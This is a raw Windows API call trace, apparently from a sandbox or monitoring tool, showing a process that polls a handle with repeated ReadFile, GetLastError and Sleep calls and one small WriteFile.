	[0249.117] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.117] GetLastError () returned 0x218
	[0249.117] Sleep (dwMilliseconds=0xa) 
	[0249.164] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.164] GetLastError () returned 0x218
	[0249.164] Sleep (dwMilliseconds=0xa) 
	[0249.242] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.242] GetLastError () returned 0x218
	[0249.242] Sleep (dwMilliseconds=0xa) 
	[0249.258] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.258] GetLastError () returned 0x218
	[0249.258] Sleep (dwMilliseconds=0xa) 
	[0249.274] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.274] GetLastError () returned 0x218
	[0249.274] Sleep (dwMilliseconds=0xa) 
	[0249.290] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.290] GetLastError () returned 0x218
	[0249.290] Sleep (dwMilliseconds=0xa) 
	[0249.305] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.305] GetLastError () returned 0x218
	[0249.305] Sleep (dwMilliseconds=0xa) 
	[0249.453] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.453] GetLastError () returned 0x218
	[0249.453] Sleep (dwMilliseconds=0xa) 
	[0249.491] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.491] GetLastError () returned 0x218
	[0249.492] Sleep (dwMilliseconds=0xa) 
	[0249.819] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0249.819] GetLastError () returned 0x218
	[0249.819] Sleep (dwMilliseconds=0xa) 
	[0250.295] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0250.295] GetLastError () returned 0x218
	[0250.295] Sleep (dwMilliseconds=0xa) 
	[0250.381] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0250.381] GetLastError () returned 0x218
	[0250.381] Sleep (dwMilliseconds=0xa) 
	[0250.428] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0250.428] GetLastError () returned 0x218
	[0250.428] Sleep (dwMilliseconds=0xa) 
	[0250.474] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0250.474] GetLastError () returned 0x218
	[0250.474] Sleep (dwMilliseconds=0x3e8) 
	[0251.520] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0251.520] Sleep (dwMilliseconds=0xa) 
	[0251.546] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.546] GetLastError () returned 0x218
	[0251.546] Sleep (dwMilliseconds=0xa) 
	[0251.554] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.554] GetLastError () returned 0x218
	[0251.554] Sleep (dwMilliseconds=0xa) 
	[0251.566] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.566] GetLastError () returned 0x218
	[0251.566] Sleep (dwMilliseconds=0xa) 
	[0251.582] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.582] GetLastError () returned 0x218
	[0251.582] Sleep (dwMilliseconds=0xa) 
	[0251.598] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.598] GetLastError () returned 0x218
	[0251.598] Sleep (dwMilliseconds=0xa) 
	[0251.657] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.657] GetLastError () returned 0x218
	[0251.657] Sleep (dwMilliseconds=0xa) 
	[0251.691] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.691] GetLastError () returned 0x218
	[0251.691] Sleep (dwMilliseconds=0xa) 
	[0251.738] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.738] GetLastError () returned 0x218
	[0251.738] Sleep (dwMilliseconds=0xa) 
	[0251.785] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.785] GetLastError () returned 0x218
	[0251.785] Sleep (dwMilliseconds=0xa) 
	[0251.810] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.810] GetLastError () returned 0x218
	[0251.810] Sleep (dwMilliseconds=0xa) 
	[0251.816] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.816] GetLastError () returned 0x218
	[0251.816] Sleep (dwMilliseconds=0xa) 
	[0251.832] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.832] GetLastError () returned 0x218
	[0251.832] Sleep (dwMilliseconds=0xa) 
	[0251.848] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.848] GetLastError () returned 0x218
	[0251.848] Sleep (dwMilliseconds=0xa) 
	[0251.863] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.863] GetLastError () returned 0x218
	[0251.863] Sleep (dwMilliseconds=0xa) 
	[0251.879] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.879] GetLastError () returned 0x218
	[0251.879] Sleep (dwMilliseconds=0xa) 
	[0251.895] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.895] GetLastError () returned 0x218
	[0251.895] Sleep (dwMilliseconds=0xa) 
	[0251.957] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0251.957] GetLastError () returned 0x218
	[0251.957] Sleep (dwMilliseconds=0xa) 
	[0252.003] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.003] GetLastError () returned 0x218
	[0252.003] Sleep (dwMilliseconds=0xa) 
	[0252.051] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.051] GetLastError () returned 0x218
	[0252.051] Sleep (dwMilliseconds=0xa) 
	[0252.068] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.068] GetLastError () returned 0x218
	[0252.068] Sleep (dwMilliseconds=0xa) 
	[0252.081] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.081] GetLastError () returned 0x218
	[0252.081] Sleep (dwMilliseconds=0xa) 
	[0252.097] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.097] GetLastError () returned 0x218
	[0252.097] Sleep (dwMilliseconds=0xa) 
	[0252.113] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.113] GetLastError () returned 0x218
	[0252.113] Sleep (dwMilliseconds=0xa) 
	[0252.130] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.130] GetLastError () returned 0x218
	[0252.130] Sleep (dwMilliseconds=0xa) 
	[0252.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.144] GetLastError () returned 0x218
	[0252.145] Sleep (dwMilliseconds=0xa) 
	[0252.159] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.159] GetLastError () returned 0x218
	[0252.159] Sleep (dwMilliseconds=0xa) 
	[0252.221] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.221] GetLastError () returned 0x218
	[0252.221] Sleep (dwMilliseconds=0xa) 
	[0252.271] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.271] GetLastError () returned 0x218
	[0252.271] Sleep (dwMilliseconds=0xa) 
	[0252.315] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.315] GetLastError () returned 0x218
	[0252.315] Sleep (dwMilliseconds=0xa) 
	[0252.348] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.348] GetLastError () returned 0x218
	[0252.348] Sleep (dwMilliseconds=0xa) 
	[0252.362] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.362] GetLastError () returned 0x218
	[0252.362] Sleep (dwMilliseconds=0xa) 
	[0252.378] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.378] GetLastError () returned 0x218
	[0252.378] Sleep (dwMilliseconds=0xa) 
	[0252.394] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.394] GetLastError () returned 0x218
	[0252.394] Sleep (dwMilliseconds=0xa) 
	[0252.455] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.455] GetLastError () returned 0x218
	[0252.455] Sleep (dwMilliseconds=0xa) 
	[0252.503] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.503] GetLastError () returned 0x218
	[0252.503] Sleep (dwMilliseconds=0xa) 
	[0252.549] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.549] GetLastError () returned 0x218
	[0252.549] Sleep (dwMilliseconds=0xa) 
	[0252.562] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.562] GetLastError () returned 0x218
	[0252.562] Sleep (dwMilliseconds=0xa) 
	[0252.565] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.565] GetLastError () returned 0x218
	[0252.565] Sleep (dwMilliseconds=0xa) 
	[0252.580] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.580] GetLastError () returned 0x218
	[0252.580] Sleep (dwMilliseconds=0xa) 
	[0252.597] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.597] GetLastError () returned 0x218
	[0252.598] Sleep (dwMilliseconds=0xa) 
	[0252.646] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.646] GetLastError () returned 0x218
	[0252.646] Sleep (dwMilliseconds=0xa) 
	[0252.690] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.690] GetLastError () returned 0x218
	[0252.690] Sleep (dwMilliseconds=0xa) 
	[0252.736] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.736] GetLastError () returned 0x218
	[0252.736] Sleep (dwMilliseconds=0xa) 
	[0252.780] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.780] GetLastError () returned 0x218
	[0252.780] Sleep (dwMilliseconds=0xa) 
	[0252.796] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.796] GetLastError () returned 0x218
	[0252.796] Sleep (dwMilliseconds=0xa) 
	[0252.799] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.799] GetLastError () returned 0x218
	[0252.799] Sleep (dwMilliseconds=0xa) 
	[0252.814] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.814] GetLastError () returned 0x218
	[0252.814] Sleep (dwMilliseconds=0xa) 
	[0252.830] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.830] GetLastError () returned 0x218
	[0252.830] Sleep (dwMilliseconds=0xa) 
	[0252.849] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.849] GetLastError () returned 0x218
	[0252.849] Sleep (dwMilliseconds=0xa) 
	[0252.862] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.862] GetLastError () returned 0x218
	[0252.862] Sleep (dwMilliseconds=0xa) 
	[0252.877] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.877] GetLastError () returned 0x218
	[0252.877] Sleep (dwMilliseconds=0xa) 
	[0252.931] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.931] GetLastError () returned 0x218
	[0252.932] Sleep (dwMilliseconds=0xa) 
	[0252.970] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0252.970] GetLastError () returned 0x218
	[0252.970] Sleep (dwMilliseconds=0xa) 
	[0253.017] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.017] GetLastError () returned 0x218
	[0253.017] Sleep (dwMilliseconds=0xa) 
	[0253.045] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.045] GetLastError () returned 0x218
	[0253.045] Sleep (dwMilliseconds=0xa) 
	[0253.048] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.048] GetLastError () returned 0x218
	[0253.048] Sleep (dwMilliseconds=0xa) 
	[0253.065] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.065] GetLastError () returned 0x218
	[0253.065] Sleep (dwMilliseconds=0xa) 
	[0253.111] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.111] GetLastError () returned 0x218
	[0253.111] Sleep (dwMilliseconds=0xa) 
	[0253.157] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.157] GetLastError () returned 0x218
	[0253.157] Sleep (dwMilliseconds=0xa) 
	[0253.249] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.249] GetLastError () returned 0x218
	[0253.249] Sleep (dwMilliseconds=0xa) 
	[0253.331] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.331] GetLastError () returned 0x218
	[0253.331] Sleep (dwMilliseconds=0xa) 
	[0253.376] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.376] GetLastError () returned 0x218
	[0253.376] Sleep (dwMilliseconds=0xa) 
	[0253.400] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.400] GetLastError () returned 0x218
	[0253.400] Sleep (dwMilliseconds=0xa) 
	[0253.407] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.408] GetLastError () returned 0x218
	[0253.408] Sleep (dwMilliseconds=0xa) 
	[0253.423] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0253.423] GetLastError () returned 0x218
